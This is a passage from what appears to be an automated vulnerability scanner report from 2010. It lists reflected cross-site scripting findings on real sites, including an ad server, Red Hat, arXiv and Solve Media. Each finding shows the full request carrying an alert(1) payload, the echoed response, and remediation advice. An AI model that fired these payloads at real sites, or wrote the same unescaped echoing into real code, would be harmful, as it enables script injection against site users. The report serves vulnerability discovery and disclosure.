The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1998f'%3balert(1)//5a4b71d2db4 was submitted in the pg parameter. This input was echoed as 1998f';alert(1)//5a4b71d2db4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p1_leader;pg=pollBooth;logged_in=0;dcopt=ist;tile=1998f'%3balert(1)//5a4b71d2db4 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 506 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT Connection: close
1.22. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/polls_p32_upper_poll_spons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.vulnerable.ad.partner
Path:
/adj/ostg.slashdot/polls_p32_upper_poll_spons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40746'-alert(1)-'60e1009256b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p32_upper_poll_spons?40746'-alert(1)-'60e1009256b=1 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 466 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:40 GMT Expires: Mon, 15 Nov 2010 22:44:40 GMT Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec18'%3balert(1)//8aee150141a was submitted in the pg parameter. This input was echoed as 2ec18';alert(1)//8aee150141a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p32_upper_poll_spons;pg=index;logged_in=0;tile=2ec18'%3balert(1)//8aee150141a HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 490 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:41 GMT Expires: Mon, 15 Nov 2010 22:44:41 GMT Connection: close
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73111'-alert(1)-'fb75417c79f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5227 Cache-Control: no-cache Pragma: no-cache Date: Mon, 15 Nov 2010 22:44:42 GMT Expires: Mon, 15 Nov 2010 22:44:42 GMT
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=73111'-alert(1)-'fb75417c79fhttp://www.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250Av2.swf'; var dcminversion = '8'; var dccreativeheight = '25 ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6183c'-alert(1)-'ab78e5025ad was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... MmG9IbIo5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ6183c'-alert(1)-'ab78e5025ad&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http:// ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29d51'-alert(1)-'06aeb8d7ca6 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... y5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-176746350352086729d51'-alert(1)-'06aeb8d7ca6&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250Av2.swf'; var dcminversion = '8'; var dccreativ ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79c4e'-alert(1)-'3f7dca77d5a was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5249
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:13:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... Io5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=179c4e'-alert(1)-'3f7dca77d5a&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDg&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2md ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba805'-alert(1)-'0de684079bd was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5249
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:13:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZfMzAweDI1MJAD6AKYA_ABqAMB0QNru26BT2N3COgDwgToA4oD6AP4A_UDAAKQgeAEAQ&num=1&sig=AGiWqtw-xQgtF7RsZmkKhy9DTH7WXGMDDgba805'-alert(1)-'0de684079bd&client=ca-pub-1767463503520867&adurl=http%3a%2f%2fwww.erollover.com/Home/Index/WatchOurAd'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/2965015/er300x250C.swf'; var dcmi ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de6c7'-alert(1)-'a55fcca6344 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 22:44:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5251
document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Fri Nov 05 18:11:19 EDT 2010 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... dvurl = 'http://www.erollover.com/Home/Index/WatchOurAd'; var alttext = ''; var dcgif = ''; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://adclick.g.vulnerable.ad.partner/aclk?sa=lde6c7'-alert(1)-'a55fcca6344&ai=BcG5anLLhTIhL1oHpBpe51MsOwbvF3wG5guf4GJGc5ddBABABGAEgmKCkGzgAYMmG9IbIo5AZsgEMd3d3LmJlYm8uY29tugEKMzAweDI1MF9hc8gBCdoBFGh0dHA6Ly93d3cuYmViby5jb20v4AECmALoB7gCGMACAcgC-Y67FOACAOoCFUJlYm9fSG9tZV9BVEZf ...[SNIP]...
The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3742e'%3balert(1)//eef01ef540e was submitted in the flash parameter. This input was echoed as 3742e';alert(1)//eef01ef540e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16ca7'-alert(1)-'492c21af936 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41bf7'%3balert(1)//d6150544e3a was submitted in the time parameter. This input was echoed as 41bf7';alert(1)//d6150544e3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.33. http://agenturtreffen-mitteldeutschland.de/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://agenturtreffen-mitteldeutschland.de
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bccef"><script>alert(1)</script>0cf1d5bb9cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bccef\\\"><script>alert(1)</script>0cf1d5bb9cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bccef"><script>alert(1)</script>0cf1d5bb9cc=1 HTTP/1.1 Host: agenturtreffen-mitteldeutschland.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:29 GMT Server: Apache X-Powered-By: PHP/5.2.12-nmm2 X-Pingback: http://agenturtreffen-mitteldeutschland.de/xmlrpc.php Cache-Control: public Expires: Mon, 15 Nov 2010 22:42:29 GMT X-UA-Compatible: IE=Edge,chrome=1 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36032
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <a href="http://agenturtreffen-mitteldeutschland.de/page/2/?bccef\\\"><script>alert(1)</script>0cf1d5bb9cc=1"> ...[SNIP]...
1.34. http://apac.redhat.com/promo/roadtour/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://apac.redhat.com
Path:
/promo/roadtour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc531"><script>alert(1)</script>9e597a2827f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /promo/roadtour/?cc531"><script>alert(1)</script>9e597a2827f=1 HTTP/1.1 Host: apac.redhat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:32 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 21588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Red Hat Asia Pacific</ ...[SNIP]... <iframe style='height:25px;width:170px;' src="http://www.facebook.com/plugins/like.php?href=http://apac.redhat.com/promo/roadtour/?cc531"><script>alert(1)</script>9e597a2827f=1&layout=standard&show_faces=false&width=170&font=arial&colorscheme=light&height=30" frameborder="0"> ...[SNIP]...
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8fce'%3balert(1)//958a17cf03f was submitted in the k parameter. This input was echoed as b8fce';alert(1)//958a17cf03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /papi/challenge.script?k=L9oIXIWrUZosdnonwORaAY-QZ-w5sMIvb8fce'%3balert(1)//958a17cf03f HTTP/1.1 Host: api.solvemedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 22:41:40 GMT Server: Apache Cache-Control: public,max-age=86400 Expires: Tue, 16 Nov 2010 22:41:40 GMT Last-Modified: Fri, 16 Jul 2010 14:54:36 GMT Connection: close Content-Type: text/javascript; charset=utf-8 Content-Length: 520
var ACPuzzleOptions; var ACPuzzleInfo = { ckey: 'L9oIXIWrUZosdnonwORaAY-QZ-w5sMIvb8fce';alert(1)//958a17cf03f', apiserver: '//api.solvemedia.com', mediaserver: '//api.solvemedia.com', lang: 'en', size: 'standard', theme: 'white', type: 'img',
...[SNIP]...
1.36. http://argouml.tigris.org/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://argouml.tigris.org
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14671"><script>alert(1)</script>d9479979be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?14671"><script>alert(1)</script>d9479979be7=1 HTTP/1.1 Host: argouml.tigris.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cba2e<script>alert(1)</script>5bf21d381dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licencecba2e<script>alert(1)</script>5bf21d381dd/lalgb.html HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:21 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5fc96<script>alert(1)</script>6c3a630078b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licence/5fc96<script>alert(1)</script>6c3a630078b HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:44:24 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 22:44:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8b662<script>alert(1)</script>16f7b91092f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO8b662<script>alert(1)</script>16f7b91092f/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:08 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861228268265; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1587
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LO8b662<script>alert(1)</script>16f7b91092f/9809032' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 76147</title><script>alert(1)</script>6f17836f4ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO76147</title><script>alert(1)</script>6f17836f4ff/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229652509; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1838
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO76147</title><script>alert(1)</script>6f17836f4ff/9809032] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 637f8</title>121218a33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <TITLE> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /abs/cs.LO637f8</title>121218a33f2/9809032 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:22 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861242763760; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1553
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO637f8</title>121218a33f2/9809032] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a1683</title><script>alert(1)</script>10f40271a6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032a1683</title><script>alert(1)</script>10f40271a6b HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:11 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861231576105; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1838
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO/9809032a1683</title><script>alert(1)</script>10f40271a6b] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3721<script>alert(1)</script>41fe0906461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032e3721<script>alert(1)</script>41fe0906461 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:10 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861230170102; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1814
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LO/9809032e3721<script>alert(1)</script>41fe0906461' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 75dc4</title><script>alert(1)</script>4425799c3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO75dc4</title><script>alert(1)</script>4425799c3a/9809032. HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229898345; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1603
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO75dc4</title><script>alert(1)</script>4425799c3a/9809032.] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1ba4<script>alert(1)</script>38523436cf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LOc1ba4<script>alert(1)</script>38523436cf0/9809032. HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:08 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861228727687; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1589
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LOc1ba4<script>alert(1)</script>38523436cf0/9809032.' not recognized</h2> ...[SNIP]...
